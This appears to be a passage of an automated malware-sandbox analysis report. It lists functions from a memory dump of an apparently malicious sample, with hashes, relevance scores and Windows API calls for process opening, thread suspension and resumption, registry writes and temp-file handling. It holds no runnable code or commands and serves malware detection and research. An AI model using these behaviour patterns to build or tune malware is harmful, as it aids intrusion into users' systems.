  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
